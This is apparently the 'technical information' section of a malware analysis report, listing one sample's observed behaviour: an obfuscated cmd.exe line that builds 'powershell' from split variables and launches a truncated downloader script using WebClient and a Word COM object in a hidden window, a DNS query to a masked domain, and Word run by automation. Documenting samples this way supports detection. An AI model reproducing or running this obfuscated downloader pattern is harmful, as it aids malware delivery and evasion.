Техническая информация
- '<SYSTEM32>\cmd.exe' /c set a=power&& set b=she&& set c=ll&& call %a%%b%%c% $GFtgyZK = 'HdJrs459m';$b4BUM = new-object System.Net.WebClient;$SitVyzm = 'Rmd9Nq3l';$vVPThS = (New-Object -ComObject word.application).v...
- DNS ASK of#####app-update.bid
- '<SYSTEM32>\cmd.exe' /c set a=power&& set b=she&& set c=ll&& call %a%%b%%c% $GFtgyZK = 'HdJrs459m';$b4BUM = new-object System.Net.WebClient;$SitVyzm = 'Rmd9Nq3l';$vVPThS = (New-Object -ComObject word.application).v...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\winword.exe' /Automation -Embedding